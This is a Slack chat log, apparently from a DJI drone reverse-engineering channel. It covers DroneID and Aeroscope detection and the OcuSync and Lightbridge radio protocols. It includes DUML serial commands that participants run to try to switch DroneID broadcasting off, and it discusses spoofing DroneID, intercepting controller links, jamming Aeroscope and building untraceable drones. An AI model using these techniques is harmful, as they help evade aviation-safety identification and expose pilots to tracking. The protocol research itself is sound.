@miliu00 DJI Fly
[2020-06-06 21:34:13]
jcase :
@david218 it still works
[2020-06-06 21:34:35]
jcase :
@boris.plintovic yes those are for aeroscope packets, those settings do alter the packets but don't disable them
[2020-06-06 21:50:48]
boris.plintovic :
@kyokushin Aeroscope is developed for DJI drones. All DJI drones have been modified since summer 2017, the driver has been modified to read and transmit telemetry data. FW 0300 Spark is the latest version of fw that does not have this modification.
However, there are devices that can detect and track down the rc of any drone. However, everything depends on the operator. I saw such a system in action and the staff scanned only 2.4 and 5.8 bands. This means that if someone switched the control of their DJI to band 2.3 or 2.5, they would probably escape attention.
[2020-06-06 21:58:17]
jcase :
no they wouldn't
[2020-06-06 21:58:25]
jcase :
i'm telling you the aeroscope can detect them
[2020-06-06 21:58:35]
jcase :
you just need to use the right features of the AS
[2020-06-06 21:58:51]
jcase :
it has a lot more features than people realize
[2020-06-06 21:59:08]
jcase :
killing droneid just removes a lot of the specific info
[2020-06-06 21:59:13]
jcase :
but you can still pick up the drones
[2020-06-07 09:19:05]
kyokushin :
@boris.plintovic Yes, that is why i asked about .300, but @jcase is telling it is still detecting a drone.
[2020-06-07 13:19:53]
jcase :
@kyokushin I'll probably get fed up and make a demo video at some point, but it can
[2020-06-07 13:19:56]
jcase :
ive got one here
[2020-06-07 15:16:34]
vznwrks :
The portable version I’m assuming?
....you have an SDR with a GPSDO perchance..?
[2020-06-07 15:29:31]
jcase :
yes and yes
[2020-06-10 17:27:36]
hardkore :
can aeroscope pickup non-dji drones/controllers? or is it just dji ?
[2020-06-10 17:50:26]
jcase :
The droneid function no, the RF analysis functions ... haven't tested, i don't know the extent of the range of frequencies and i don't know what non DJI drones operate on.
[2020-06-12 16:49:17]
nopexecutor :
Finally got myself my first DJI drone - MA2 :slightly_smiling_face:
[2020-06-12 16:50:56]
nopexecutor :
frame structure seems a little different than in P4Pv2... sounding signal position changed. I wonder what else... I hoped for same OcuSync 2.0, but now it seems I have two radio systems to analyze ^^
[2020-06-12 16:52:05]
jcase :
@takeshi87 it will also sometimes apparently change firmware to firmware.
[2020-06-12 16:55:53]
nopexecutor :
so maybe just minor changes, will need to check that :slightly_smiling_face:
[2020-06-14 06:45:40]
eseven :
thx @david218 . These values were available in DJI Go some versions ago. If you set that info, it is also broadcast by the drone in a second packet (not droneid packet). Interesting if you want pilots to send info about their flights. ;)
[2020-06-14 19:23:59]
nopexecutor :
I can see it's still there in Dji Fly app - at least for MA2
[2020-06-16 16:53:24]
nopexecutor :
Yup... Frame structure changed a little, channel mapping is different. Scrambling & FEC looks unchanged, I can retrieve transport blocks. I didn't analyze underlying protocol yet in MA2, need to add 64-QAM demod first - otherwise I miss the most interesting PDUs :) Probably after that I'll see what comes after demodulation of what seems to be aeroscope bursts
[2020-06-16 17:01:14]
david218 :
What extra info/devices does enabling that setting provide? Can other nearby DJI users see you or something...?
[2020-06-16 17:32:23]
hazardc :
lol no need to prove @jcase just appreciate the insight :slightly_smiling_face:
[2020-06-16 17:33:33]
jcase :
Prove what
[2020-06-19 03:45:27]
ben_lin :
now if you remove specific important info from droneid, wouldn't that render the signal quite useless for whoever is using the managing equipment? Like, he knows a drone is here, but doesn't know who this belongs to and where the RC is
[2020-06-19 03:46:02]
ben_lin :
or, DJI has gone far enough to do RF analysis to locate the RC rather than just getting it from droneID...
[2020-06-19 13:10:34]
jcase :
@ben_lin I'd disagree
[2020-06-19 13:12:52]
ben_lin :
So you're saying even if we give droneid 0 info, it is still a threat to the drone operator as long as the physical signals are present?
[2020-06-19 13:34:14]
dkovar :
Any RF signal is a "threat to the operator".
[2020-06-19 14:33:07]
jcase :
@ben_lin I'd say the drone is the threat personally, but yeah not only is general detection still possible, intercepting or tampering with the comms is not only possible but a reality. Entirely possible to intercept the link between the RC and AC and pull location data, without droneid, and tooling to do this exists on the market to do this now
[2020-06-19 14:33:47]
jcase :
hell you can build the tooling for yourself for some of the models for under $100 and implement the software with minimal work
[2020-06-19 16:29:54]
fredmicrowave :
In an urban area, if your signal is in normal bands (2.4ghz...) and has no ID it can be extremely difficult to RDF ...
[2020-06-19 16:35:13]
jcase :
@fredmicrowave commercial tech exists to intercept the wifi, light bridge and occusync links, anyone that thinks removing droneid alone stops anything is in denial. I can intercept some links as is, with equipment bought off amazon and ebay.
[2020-06-19 16:39:49]
fredmicrowave :
Oh yes, there must be much data info traveling beside droneid, I was just referring to direction finding a random signal in urban areas...
I suppose only a diy drone could escape data interception...
[2020-06-20 00:47:54]
hotelzululima :
you could use ardupilot (or openpilot? or Paparazzi) with the signal loss failsafe set to complete mission (& then turn off ground rc & xmitters aboard craft (requires a wee bit of custom code)) & then yes you CAN construct a stealth aerial robot…
[2020-06-20 00:50:12]
hotelzululima :
but the frequency hopping sequence for the 3DR modems will always be one of 50 sequences due to errors in the hopping implementation code (wide band SDR & some math is the kryptonite for most commercial hoppers)
[2020-06-20 09:36:38]
validat0r :
Yep .. Did that with my spark once. Works. Although there's the risk of not reconnecting with your RC afterwards. Had that, too, once. Had to wait until the bat ran empty and catch the ac from about 30ft height.
[2020-06-20 14:49:11]
ender :
Yes arducopter was the first thing that came to my mind when all the terrorist & criminals vs droneid thing came up. Dirt cheap and frighteningly easy :-(
[2020-06-21 05:19:02]
ben_lin :
Guess it never is easy to just be cautious and enjoy some aerial photographing then...
[2020-06-21 11:35:30]
fredmicrowave :
To keep it simple, if the signal identification is more of a concern than the physical drone interception, a simple analog video signal and RC system could work.
Or, a completely out-of-band link would be very hard to find. This is why I was talking about urban areas, when you can hide in the forest of rf signals.
For photography you don't need a super stable or fancy drone.
[2020-06-21 11:58:44]
ben_lin :
That is correct, however for photographers that aren't necessarily very tech savvy, DJI stuff is the first choice. And dense urban areas are likely the only kind of places that photographers need this kind of protection from droneID, as they are quite often deployed there.
[2020-06-21 12:00:00]
ben_lin :
My thought was that, if droneID has all its info removed, it would be very difficult for those droneID operators to locate the photographer as their DJI-bs equipment on hand, at least from what I know, depends on the info carried by droneID to locate the RC
[2020-06-21 12:01:21]
ben_lin :
because usually those droneID people are not given extreme professional training and equipment to handle a spoofed droneID signal
[2020-06-21 12:03:32]
ben_lin :
I went to DJI's site about droneID, and it doesn't even talk about being able to discover non-droneID copters and listed the specific drones that are "compatible" with the devices, which led me to think it might be valuable to spoof droneid
[2020-06-21 13:40:42]
w4t3r :
What about the data sent to the RC? Isn't that interceptable too? @ben_lin
[2020-06-21 13:42:02]
ben_lin :
that data sent to the rc doesn't include location data about the rc IF droneID info is removed
[2020-06-21 13:42:35]
ben_lin :
correct me if i am wrong though, there are people here that are a lot more knowledgeable on this than I am
[2020-06-21 14:31:03]
jcase :
@ben_lin maybe IF he moved a GREAT distance, but you're forgetting that AS can tell the home point, and generally see the full flight path
[2020-06-21 14:45:28]
ben_lin :
ah, guess DJI does have a few tricks up their sleeves then
[2020-06-21 14:45:51]
ben_lin :
but wouldn't the flight path and homepoint be part of the info of droneID that can be spoofed? no?
[2020-06-21 14:49:50]
jcase :
@ben_lin spoof it all you want, or enter privacy mode, bring it near my aeroscope i can gather all the details from it needed to find you
[2020-06-21 14:50:05]
jcase :
tampering with it is just going to make it obvious something fishy is going on
[2020-06-21 15:37:55]
pingspike :
has anyone seen any signs of that smartphone app DJI said they were going to release? the one that just lets any random person view the details of the passing drone? did the app ever make it?
[2020-06-21 15:56:02]
jcase :
@rich the standard isn't even finalized i don't think
[2020-06-21 15:56:05]
jcase :
certainly the design isn't
[2020-06-21 15:56:17]
jcase :
but DJI isn't the outfit designing it
[2020-06-21 15:56:21]
jcase :
amazon and google have taken the lead
[2020-06-21 15:57:47]
pingspike :
ahhh right; I see
[2020-06-21 15:57:50]
pingspike :
[https://www.dji.com/mobile/newsroom/news/dji-demonstrates-direct-drone-to-phone-remote-identification](https://www.dji.com/mobile/newsroom/news/dji-demonstrates-direct-drone-to-phone-remote-identification)
[2020-06-21 15:58:23]
pingspike :
I thought DJI were just making an app that reveals DJI drone info - I’m with you now
[2020-06-21 15:59:02]
jcase :
they demoed using an aeroscope to pull the user's email address too
[2020-06-21 15:59:09]
jcase :
however i don't see that functionality on my AS nor in the app
[2020-06-21 15:59:16]
jcase :
i think they demo fake shit sometimes
[2020-06-21 16:25:37]
ben_lin :
lmao that is straight up dumb
[2020-06-21 16:26:25]
ben_lin :
and pulling email address... how is that going to be useful for aerial safety? **confused pikachu face**
[2020-06-21 16:36:01]
validat0r :
They can hook you up with a lawyer maybe.
[2020-07-06 07:01:51]
hotelzululima :
heh heh & ALL of this assumes that the drone was ordered with valid PII; if OPSEC/tradecraft was used then all DJI has is dead ends as far as purchaser data goes
[2020-07-06 09:50:26]
nopexecutor :
fake identity will not help you much if you are caught on place, e.g. based on pilot coordinates broadcasted by the drone :wink:
[2020-07-06 09:52:19]
nopexecutor :
BTW. I saw in the droneId packet that disabling UUID actually makes this part of the message all 0x00. Anyone have any idea how this UUID is generated / if it can be matched to some other data using publicly accessible APIs / etc.?
[2020-07-06 09:53:38]
nopexecutor :
in the form I saw it, it's just a 19 byte ASCII encoded string, with just digits
[2020-07-08 18:45:44]
jcase :
@takeshi87 yes, it can be matched to individual pilot
[2020-07-12 14:59:52]
eitan1195 :
using the dji_imah_fwsig to unpack version V01.03.0200_Mavic_dji_system.bin - trying to unpack 0907 module for the modemarm - but the output of the modem is strange. any other way to open it? i used dji_imah_fwsig.py -vv -u -i modemarm_file
[2020-07-23 12:09:17]
sergey.muhlynin :
Mavic 1 pro, fw 04.0300. Any idea to disable or spoof DroneID identifier (except rollback to 03.0700)? Or changing broadcasted fc serial number (serialnumber char[16])? Patching dji_network binary just disables broadcasting over WiFi connection, not OccuSync.
[2020-07-23 18:20:14]
jcase :
no legitimate point, still can be picked up
[2020-08-20 03:47:54]
hotelzululima :
So @jcase what exactly does Aeroscope display for a mp1 running 1.03.0700? since no supposed drone id.. any way for aeroscope to distinguish uniquely between multiple drones all running that release?
[2020-08-20 13:26:49]
jcase :
probably wave form
[2020-11-16 19:05:39]
nopexecutor :
just wondering - anybody has any RF recordings from mavic mini 2?
[2020-12-23 09:51:50]
rachfly :
Do you know if aeroscope can track mavic pro 2 or mavic air 2?
[2020-12-23 10:40:44]
the_lord :
aeroscope can track any DJI drone using LB, Ocusync, Ocusync 2 or WiFi
[2020-12-23 15:33:03]
pingspike :
:man-running::skin-tone-3:
[2020-12-24 05:08:45]
fallengod :
Any way to jam aeroscope to make it useless ?
[2020-12-24 09:10:02]
heresmydron :
planning to do something nasty? :smile:
[2020-12-24 14:36:13]
mingtao :
Yes..
[2020-12-24 23:10:46]
fredmicrowave :
<https://www.youtube.com/watch?v=EdRvaTlKJIA>
[2021-01-21 16:38:25]
validat0r :
Question: is droneid effectivly disabled by setting Switch (10->03, set 3, id: 218, SubCmd: 5) to 00?
[2021-01-21 22:45:16]
nopexecutor :
could you please elaborate on that "Switch"? Is it some DUML command to be sent to AC?
[2021-01-22 11:04:13]
nopexecutor :
do you mean "FlyC Detection" cmd?
[2021-01-22 11:07:04]
validat0r :
yes
[2021-01-22 11:14:17]
validat0r :
the .22 app enables the whole array of droneid "aspects" on startup. changing that to "disable all aspects" is easy.
[2021-01-22 11:19:50]
nopexecutor :
Ah, I didn't realize it's the command behind the GUI of dji app... is value 0 one of those used by app? AFAIR I checked one of those options some time ago, but it didn't disable DroneID transmission on air, just did clear some of its fields
[2021-01-22 11:20:19]
validat0r :
ofc I cannot be sure whether this completely disables it. I have no gear to test it properly with Mavic Pro
[2021-01-22 11:21:40]
validat0r :
how did you test? on spark I had the feeling I can test it with kismet .. does Mavic Pro work the same way or does it emit some occu droneid frames?
[2021-01-22 11:22:30]
nopexecutor :
MA2 + SDR
[2021-01-22 11:23:23]
validat0r :
ah, ok .. I have a rtl sdr here .. how can I use that to check?
[2021-01-22 11:24:31]
validat0r :
MA2 should be hard .. AFAIK no open dji go4 for MA2, and no root on the AC
[2021-01-22 11:24:37]
nopexecutor :
that may not be possible without further HW... rtlsdr runs till ~1700MHz, you need to get to at least 2.4
[2021-01-22 11:25:01]
validat0r :
ok. then I'm out of luck.
[2021-01-22 11:27:04]
validat0r :
maybe I should check on kismet, just in case MP sends droneid on WiFi 5MHz-chan as well
[2021-01-22 11:28:25]
validat0r :
but IIRC it's been said that aeroscope has RF modules for wifi/occu/lb/etc.
[2021-01-22 11:52:10]
nopexecutor :
still, even if DroneID packet would be gone (not sure though), there are also flight records streaming to RC on the main DL channel. If I saw correctly, on some drones it's encrypted, on some it is not...
[2021-01-22 11:54:57]
validat0r :
good point.
[2021-01-22 12:03:14]
validat0r :
one could argue though that receiving droneid beacons is much more robust than decoding the AC/RC channel
[2021-01-22 13:52:01]
validat0r :
oh cmon .. :smile: I tried to see AC/RC with my SDR, instead I see my SDR in DJI GO signal graph
[2021-01-22 13:52:34]
validat0r :
i hate rf
[2021-01-22 16:36:44]
nopexecutor :
xD it's the rtlsdr you mentioned?
[2021-01-22 16:39:00]
nopexecutor :
that might be right... If I saw correctly there are some additional robustness features in DroneID signal, like alternately sending it from different antennas (at least that is my guessed explanation of the signal behavior)
[2021-01-22 16:39:42]
nopexecutor :
BTW. I wonder now what DJI will do with EU type certifications of the drones...
[2021-01-22 16:40:11]
nopexecutor :
one of the requirements for some classes is that the drone ID signal has an open specification :wink:
[2021-01-22 16:42:10]
nopexecutor :
currently it shares some commonalities with the main DL signal, so opening its specification may attract more attention also in its direction... or maybe if they can/will invite something new and push it via FW updates...
[2021-01-22 16:53:21]
validat0r :
Probably not on the mp1
[2021-01-22 16:54:54]
validat0r :
Yeah .. Tuning the rtlsdr to like 1205MHz gives a spike in dji go spectrum graph at 2410MHz .. Alternating the freq makes the spike in dji go shift, too ..
[2021-01-22 16:55:38]
validat0r :
I mean, just reading from the rtlsdr, not writing
[2021-01-22 16:56:26]
nopexecutor :
sure... its local oscillator must be leaking, with its harmonics...
[2021-01-22 16:57:22]
validat0r :
With Linux, gqrx
[2021-01-22 16:58:14]
validat0r :
Yeah, I figured .. Anyway, didn't expect that. The other way around I didn't see anything in the spectrum
[2021-01-25 15:04:45]
tmbinc :
NopExecutor, you've asked for Mini2 RF records.. I have some, still interested?
[2021-01-25 15:05:37]
tmbinc :
<https://dji-rev.slack.com/files/U01LD2PMGRE/F01KY7EDE6Q/image.png>
[2021-01-25 15:05:49]
tmbinc :
(I can share I/Q files if anyone is interested)
[2021-01-25 15:09:46]
jcase :
I like seeing others share stuff here
[2021-01-25 15:42:44]
tmbinc :
I guess if someone replays this correctly you would figure out my home address ;)
[2021-01-26 18:45:10]
nopexecutor :
what a sick samplerate! xD
[2021-01-26 19:13:25]
nopexecutor :
I love the quality of this signal
[2021-01-26 20:05:49]
nopexecutor :
As far as I can tell, at least DL part is very similar to OcuSync2 variant from MA2. It utilizes TBS I haven't observed before, but having found it all the CRCs match. Still, the only unencrypted part I can see there is something that is probably just radio link layer / harq feedback. Could say more if I got the recording from the start.
[2021-01-26 20:06:41]
nopexecutor :
btw. the duty cycle is quite small compared to what I saw previously... short bursts only...
[2021-01-28 21:58:47]
atlantic :
Do you have some details about how to demodulate this signal? Symbol duration, cyclic prefix, number of tones and pilot tones, fft size, etc.
[2021-01-29 08:30:48]
atlantic :
thanx a lot for that 200 MHz sample rate file. Here's a little program to convert big endian to little endian for processing on little endian intel machines.
[2021-01-29 09:17:11]
atlantic :
and we will not find your home address, as there is no GPS signal in your RC cage (-:
[2021-01-29 09:26:25]
peteair :
@tmbinc you have a samplerate of 100 Msps or more right ? out of curiosity what's the receiver you used ?
[2021-01-29 09:46:02]
nopexecutor :
It's described in txt file in archive
[2021-01-29 09:48:48]
nopexecutor :
Regarding demod - yup, I've got most of that worked out, with final duml / video data extraction (although vid. part still glitchy when packets are lost). Still there are some small mysteries left... LTE PHY 3gpp docs are your friend if you want a starting point
[2021-01-29 09:48:48]
peteair :
I see :slightly_smiling_face:
[2021-01-29 10:42:43]
tmbinc :
Very nice work - let me know if you need more/different recordings. I now realize that both symbol rate (~15kHz) and bandwidth options match LTE. Is the sync/training/middle block also similar to LTE?
I guess I go read 3GPP TS 36.211 a bit.
[2021-01-29 10:43:23]
tmbinc :
@pierreduf it's a very hacky setup based on a variety of RF equipment I've ebay'ed/auctioned over the years :)
[2021-01-29 13:01:29]
nopexecutor :
Nope, there are no PSS/SSS, nor cell specific RS like in LTE DL, there is some simpler solution in place that is actually similar to one of the signals from LTE UL ;) in general there are many similarities to LTE in different layers, but at the same time in almost all layers there are some differences
[2021-01-29 14:14:46]
peteair :
ahah it does not seem so hacky :slightly_smiling_face: nice setup anyway. As for demod I guess we are more and more interested in that :smile:
[2021-01-29 16:44:54]
atlantic :
@takeshi87 you're not giving it away that easy. Fair enough, I like a puzzle. I assumed OcuSync was some form of wi-fi adapted for long range, but thanks for the hint on LTE. Using auto correlation we found a symbol duration of 66 us. In another reply 15 kHz is mentioned, so that confirms our own finding. I am going to dig into the LTE. I hope we can ask you for another hint if we get stuck on our quest.
[2021-01-29 16:47:42]
jcase :
to put this out there, if you find a valid attack on OC/OC2, I will most likely be willing to buy it.
[2021-01-29 16:48:00]
jcase :
and can arrange for permits/attorneys to ensure it's legal and safe
[2021-01-29 18:04:41]
tmbinc :
Need to ask some stupid questions now. At 10MHz nominal BW, LTE uses 601 subcarriers with 15kHz each, so 9.015MHz actual bandwidth. Is that number correct for DJI? I thought I've seen ~9.4MHz OBW, but that was an estimation. Is the symbol rate exactly 15kHz, and carrier spacing exactly 15kHz?
I'd then use an FFT, with a size that gives me a frequency resolution of 15kHz, align the sync pilots (so I assume the first symbol has constant pilots and nulls elsewhere?), and then continue with all symbols?
[2021-02-03 18:59:26]
atlantic :
Is the DroneID signal embedded in the 10 or 20 MHz LTE-like downlink or is it a separate signal?
[2021-02-03 19:08:32]
validat0r :
Maybe @tmbinc has put the mini without props in his cage and can help here
[2021-02-03 20:02:20]
atlantic :
Seems obvious to have a separate signal that is easier to acquire for devices like Aeroscope than an OFDM signal. And also to have a better link budget if you have a lower-bandwidth signal, to maximize the detection range of an Aeroscope-like system.
[2021-02-03 20:10:50]
atlantic :
When I put the Mavic Pro in wi-fi mode I see the remote ID stuff in the wi-fi beacon only when I put the motors on. Is that also the case with OcuSync?
[2021-02-03 20:15:03]
validat0r :
i'd like to know that, too :smile:
[2021-02-03 20:15:45]
validat0r :
nice to have some kind of confirmation that MP1 seems to be behaving like Spark in that respect.
[2021-02-03 20:25:36]
nopexecutor :
I haven't seen it from MM2 (not there in the sample), but from MA2, M2 and P4Pv2 it was a separate signal, 10MHz
[2021-02-03 20:32:29]
atlantic :
On the same frequency?
[2021-02-03 20:35:52]
atlantic :
In the sample from tmbinc I saw something 32 us wide, seems like three times something, 32 us total, followed by 8 us silence and then the 1 ms LTE-like frame. This part before the LTE frame is not that remote ID signal, right?
[2021-02-03 20:41:32]
validat0r :
tmbinc's sample should have been without motors turned on .. so it's not clear if there's DroneID in it at all
[2021-02-03 20:59:34]
atlantic :
It is a sample of 167 ms. I think a drone ID is sent every second, so you need to have a sample of more than a second. I assume it is sent every second because the seqNum in the remote ID increments by the same number as the seconds since the last received message.
[2021-02-03 21:07:44]
nopexecutor :
in MA2 it's enough to connect RC with phone and app connected to trigger DroneID broadcast. It's sometimes in band, sometimes with some offset, but can as well be on totally different freq. It happens every 640ms
[2021-02-03 21:08:49]
validat0r :
that's OcuSync ..
[2021-02-03 21:08:54]
nopexecutor :
yup
[2021-02-03 21:09:01]
validat0r :
good to know
[2021-02-03 21:10:41]
validat0r :
if you feel like it you could send a duml to the AC to try to shut it off
[2021-02-03 21:10:54]
validat0r :
would love to know if that works
[2021-02-03 21:14:58]
nopexecutor :
any smart, or maybe obvious way to send duml to AC, while having RC+phone connected to it? I have one but it requires using additional phone / tablet and pc... Or you mean directly to AC?
[2021-02-03 21:16:21]
atlantic :
Thanks @takeshi87, I will try to find it. I have a Mavic Pro.
[2021-02-03 21:16:31]
validat0r :
yes, directly .. I have no experience with MA2 .. do you get a serial port if you connect the AC to your PC?
[2021-02-03 21:18:19]
validat0r :
you should get the dji-firmware-tools off of github. DUMLs can be sent via comm_serialtalk.py
[2021-02-03 21:19:02]
validat0r :
the line to supposedly switch droneid off is like that
[2021-02-03 21:19:05]
validat0r :
./comm_serialtalk.py /dev/ttyACM0 -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 0500000000
[2021-02-03 21:20:24]
validat0r :
if recent dji go 4 versions behave like the one I analyzed, it's switched on on startup, but maybe you can switch it off again.
[2021-02-03 21:40:44]
nopexecutor :
hm, the DroneID signal is still there. Didn't try to decode it though (it happened just on the edge of BW set on my SDR), but I guess no real change.
[2021-02-03 21:41:56]
validat0r :
what's the output of this command:
[2021-02-03 21:41:57]
validat0r :
./comm_serialtalk.py /dev/ttyACM0 -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 06
[2021-02-03 21:42:36]
validat0r :
maybe the duml isn't working on MA2 .. 0x06 is GetSwitch. 0x05 is SetSwitch
[2021-02-03 21:54:56]
nopexecutor :
55 13 04 03 03 0a 00 00 80 03 da 06 00 5f 00 00 00 62 78
[2021-02-03 21:57:11]
validat0r :
5f means enabled
[2021-02-03 21:57:48]
validat0r :
maybe shut dji go 4 down, use first cmd again, check RF, check 0x06 cmd
[2021-02-03 21:58:34]
validat0r :
what's the answer duml for the first cmd?
[2021-02-03 22:18:00]
nopexecutor :
now it is "55 13 04 03 03 0a 00 00 80 03 da 06 00 00 00 00 00 8d 1f", but droneId signal still present
[2021-02-03 22:18:20]
validat0r :
bummer
[2021-02-03 22:22:31]
validat0r :
is there any situation when it's not present? like when no GPS, like when no App present, no RC present, directly after startup?
[2021-02-03 22:42:51]
tmbinc :
But it does look like a regular downlink packet? just at 10MHz?
[2021-02-03 22:43:44]
tmbinc :
If MM2 does the same then I should have been able to observe it. (Though I don't remember if I actually had the app connected, or just the RC)
[2021-02-03 22:53:55]
nopexecutor :
similar to the regular DL, but the structure differs a little bit. There are cases when I can't see the signal (like right now :/) but it's hard for me to be sure sometimes if it's gone, or if I look in the wrong place - I'm BW limited right now :wink:
[2021-02-03 22:55:47]
nopexecutor :
argh, it forces me to do SW update in order to be "flyable"... I postponed it for months...
[2021-02-03 22:57:29]
validat0r :
that can be tricky to get rid of
[2021-02-03 22:57:42]
validat0r :
without doing the update i mean
[2021-02-03 22:58:35]
validat0r :
my mini is still on the very first fw ver
[2021-02-03 23:07:54]
nopexecutor :
hm, after AC restart error is gone and it's again "start allowed", but no SW update happened... whatever ^^
[2021-02-04 09:13:10]
atlantic :
Tried to find the 10 MHz drone ID signal of my Mavic Pro but nothing found yet. I do not have an RF cage, so I see lots of other activity in the 2.4 GHz band. Probably tomorrow some time to take the drone and HackRF to a place in the middle of nowhere where there is no wi-fi, if such a place exists nowadays.
[2021-02-04 13:40:53]
atlantic :
I've been outside to a place where it was a lot quieter in the 2.4 GHz band. The Mavic Pro starts up at 2409.5 MHz. When the RC + DJI GO 4 are powered on, it switches to a different frequency. I see the downlink and the frequency-hopping uplink, but I did not see another signal, 10 MHz wide every 640 ms. Unless it is "hidden" between the regular DL frames.
[2021-02-04 14:37:23]
tmbinc :
I _think_ I may have captured the DroneID packet.
[2021-02-04 14:38:05]
tmbinc :
I couldn't close the RF cage and also the phone is in there as well, but this is clearly an OcuSync packet at 10 MHz (the middle one)
[2021-02-04 14:56:17]
tmbinc :
<https://dropmefiles.com/NnXxL> (note: they are little endian now, otherwise same format)
[2021-02-04 14:56:24]
tmbinc :
They repeat exactly every 640ms
[2021-02-04 15:47:28]
atlantic :
@tmbinc you are my hero!
[2021-02-04 15:50:32]
validat0r :
so, what does it say?
[2021-02-04 15:55:23]
atlantic :
stupid me, I only checked 2.4 GHz, the beacons are in the 5.8 GHz band
[2021-02-04 16:10:41]
nopexecutor :
yup, that's it
[2021-02-04 16:19:17]
tmbinc :
SNR is a bit worse on this, I forgot to set the reference level correctly. If it's not sufficient, let me know and I repeat.
[2021-02-04 16:19:47]
tmbinc :
Not sure if DroneID packets are a.) at a fixed frequency, always, b.) always relative to the downstream, but in the same band, or c.) always in the 5GHz band, but at random frequencies
[2021-02-04 16:28:17]
atlantic :
It looks like there is a pattern in the middle, I thought something like that was for sync at the beginning. learning something new every day...
[2021-02-04 16:29:40]
tmbinc :
The ZC sequences, yeah.
[2021-02-04 16:30:27]
tmbinc :
@takeshi87 probably has already figured out all of this :) but they appear to be in different places, there's a downlink packet that has two of them in the first 2 symbols, not the usual 0/7/14 (first/middle/last) pattern
[2021-02-07 14:29:26]
atlantic :
Maybe first some random noise to let the automatic gain control adapt, then ZC for coarse sync, then symbol ?, then ZC for fine sync and then three symbols with actual data.
[2021-02-19 13:06:24]
mats.bohlinsson :
I've been browsing in the android code, and saw some calls to setUUID. Is this the same as droneid or is it something else? What is the format on UUID? How do I find out what UUID that is linked to my DJI-account?
[2021-02-19 13:11:24]
jcase :
it's either a standard uuid in ascii
[2021-02-19 13:11:25]
jcase :
or
[2021-02-19 13:11:32]
jcase :
package name of the application that sent it
[2021-02-19 13:11:51]
jcase :
so some apps using the sdk will set it to something like com.foo.whatever
[2021-02-19 13:11:58]
jcase :
this is only seen in the sdk
[2021-02-19 13:12:27]
jcase :
you could reverse the api, and get it from dji's server
[2021-02-19 13:12:28]
jcase :
or
[2021-02-19 13:12:33]
jcase :
add a log function into the app
[2021-02-19 13:12:36]
jcase :
and print it to logcat
[2021-02-19 13:12:44]
jcase :
or several other routes
[2021-02-19 13:13:10]
validat0r :
./comm_serialtalk.py /dev/ttyACM0 -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 08
[2021-02-19 13:13:14]
validat0r :
GetUUID
[2021-02-19 13:14:03]
validat0r :
wasn't sure how this is connected to anything either
[2021-02-19 13:14:42]
validat0r :
some 4219...6658 value for my mavic
[2021-02-19 13:15:29]
validat0r :
first glance reminded me of a GPS position, but probably not the case
[2021-02-19 13:15:35]
jcase :
that gets it from the drone
[2021-02-19 13:15:44]
jcase :
which may not always be the one linked to your account
[2021-02-19 13:15:59]
jcase :
using stock dji app, that would work
[2021-02-19 13:16:20]
jcase :
but using some app using the sdk it wont work, nor with some of the modified apks
[2021-02-19 13:29:39]
mats.bohlinsson :
ok thanks!
[2021-02-20 19:50:21]
jordanphinney :
Hi guys, have you figured out a way to prevent the AC/RC from broadcasting DroneId beacons?
[2021-03-15 11:49:22]
reza.qodsi1362 :
I have done some reverse engineering work on the Lightbridge protocol. Actually it's MIMO OFDM, to be precise a 1024-point FFT. The OFDM and MIMO part is done; now I am stuck on the interleaving part. The Lightbridge protocol is based on WiMAX.
[2021-03-15 13:49:49]
atlantic :
you already tried the standard permutation stuff of WiMAX?
[2021-03-15 15:57:27]
tmbinc :
Is there any similarity between lightbridge and OcuSync?
[2021-03-16 17:20:43]
reza.qodsi1362 :
It's not standard, actually customized. OcuSync is customized LTE and Lightbridge customized WiMAX.
[2021-03-23 06:50:09]
atlantic :
Does somebody already have a I/Q recording of the OcuSync signal of the DJI FPV? Is that OcuSync 3? Any known differences between version 2 and 3?
[2021-03-23 22:32:57]
tmbinc :
40MHz channels are new
[2021-03-24 06:37:46]
cloudwerx :
I have a Mavic Pro Platinum, rooted with custom FC, have been looking into the droneID/Aeroscope stuff and it appears there is a way to spoof your droneID data [https://greyarro.ws/t/anatomy-of-dji-drone-id-implementation-re-aeroscope/10902](https://greyarro.ws/t/anatomy-of-dji-drone-id-implementation-re-aeroscope/10902). Is there a way to lock this in or just totally disable drone ID from starting up, ever? I should mention I'm on the latest FW 01.04.0500. Also, does spoofing/breaking droneID screw up anything in terms of flight functionality, and is Aeroscope still broadcasting everything when DroneID is disabled? I am using a modified version of the latest nosecneo Android app btw
[2021-03-24 19:05:04]
validat0r :
you could pack your spoofing stuff into dji go 4
[2021-03-24 19:06:27]
validat0r :
but afterwards you'd have to check against an aeroscope .. and nobody who has one will help you
[2021-03-24 22:10:24]
cloudwerx :
Hmm, I would think that, at least with OcuSync 1 on the Mavic Pro, before they had thought of all the Aeroscope stuff, the DroneID data is what gets passed off over OcuSync; seems like someone would have found that data by now in the FW or application. Also, sounds like DroneID wasn't even introduced until FW 01.03.800. Perhaps this is just hopeful thinking. I do have a decent SDR setup, NooElec NESDR SMArt XTR and Ham It Up with various antennas, would love to figure out a way to test this: small faraday box, check OcuSync packets/sizes and see what changes when messing with the droneID params
[2021-03-25 12:49:49]
validat0r :
there are guys here who did the same. tmbinc for one.
[2021-03-26 19:40:48]
thepaulkaplan :
What samp_rate you want?
[2021-03-26 20:02:26]
atlantic :
thanks for your reply. if the drone is set to 20 MHz, please sample at 30.72 MS/s, if your equipment can do it.
[2021-03-26 20:05:25]
atlantic :
and if your equipment allows it, sample with a tuning offset of 10 MHz so the signal is not in the middle where it has a DC spike.
[2021-03-26 20:41:12]
thepaulkaplan :
Ok, I'll try next morning
[2021-03-26 21:14:24]
atlantic :
thanks in advance
[2021-03-26 21:17:04]
thepaulkaplan :
I don't understand about offset
so, it's not 10 mhz)
[2021-03-26 21:18:23]
thepaulkaplan :
or make record in half a band?
[2021-03-26 21:20:15]
atlantic :
nevermind the offset then. this looks good!
[2021-03-26 21:20:40]
atlantic :
what sdr do you have?
[2021-03-26 21:20:59]
thepaulkaplan :
USRP B200mini
[2021-03-26 21:21:57]
thepaulkaplan :
what is the right sample rate to demod mavic signals? :smiley:
[2021-04-05 20:56:26]
pingspike :
seen this?
[https://twitter.com/uavhive/status/1379128018740903936?s=21](https://twitter.com/uavhive/status/1379128018740903936?s=21)
[2021-04-05 20:56:35]
pingspike :
can anyone confirm this?
[2021-04-05 20:57:15]
pingspike :
that unlocking a DJI authorization zone sends notifications to law enforcement / aeroscope users?
[2021-04-08 11:51:22]
pingspike :
anyone?
[2021-04-08 13:35:42]
cloudwerx :
